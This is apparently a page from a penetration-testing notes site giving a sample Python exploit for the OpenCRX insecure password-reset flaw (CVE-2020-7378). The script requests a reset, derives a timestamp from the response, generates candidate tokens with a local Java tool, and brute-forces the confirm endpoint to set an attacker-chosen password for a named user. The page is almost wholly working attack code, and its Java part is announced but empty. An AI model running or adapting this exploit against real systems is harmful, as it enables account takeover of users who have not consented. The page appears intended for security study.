Exploit Writing

Sample Python exploit for Unsecure Password Reset

The exploit is based on the OpenCRX authentication bypass vulnerability: https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378 (Other example)

Python part (which also uses .jar program to generate the token list):

import requests
import os
from datetime import datetime
from email.utils import parsedate_to_datetime
import argparse

# configuration
parser = argparse.ArgumentParser(description='OpenCRX authentication bypass')
parser.add_argument("-i", "--ip", type=str, help='OpenCRX IP / hostname', required=True)
parser.add_argument("-l", "--login", type=str, help='Login of the user we want to hack', required=True)
parser.add_argument("-p", "--password", type=str, help='New password which will be set after exploit run', required=True)
args = parser.parse_args()

url = "http://{}:8080".format(args.ip)
lines = []
user = args.login
new_password = args.password
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# send password reset request
data = {
     "id": user
}

r_gettime = requests.post("{}/opencrx-core-CRX/RequestPasswordReset.jsp".format(url), data=data, verify=False, proxies=proxies)
date = r_gettime.headers.get("Date")

# convert data to epoch
dt = parsedate_to_datetime(date)
epoch_time = int(dt.timestamp() * 1000)

# generate tokens using java
start = epoch_time - 1000
stop = epoch_time + 1000

os.system("java -jar /Users/kamil/projekty/labRandom/out/artifacts/labRandom_jar/labRandom.jar {} {}".format(start, stop))

# import tokens from generated file
with open("tokens.txt") as file:
    lines = [line.rstrip() for line in file]

# Brute force through tokens
# Data: t=resetToken&p=CRX&s=Standard&id=guest&password1=password&password2=password

print ("Please Wait")
print ("Hacking in progress...")
counter = 0

for line in lines:
    counter += 1
    data = {
        "t": line,
        "p": "CRX",
        "s": "Standard",
        "id": user,
        "password1": new_password,
        "password2": new_password
    }

    r = requests.post("{}/opencrx-core-CRX/PasswordResetConfirm.jsp".format(url), data=data, verify=False, proxies=proxies)
    response = r.text
    if "Unable to reset password" not in response:
            print("Successful reset with token: %s" % line)
            print("You can now login with the following credentials: {}, {}".format(user, new_password))
            break

Java Part:

PreviousExploitationNextCross Origin Resource Sharing (CORS)

Last updated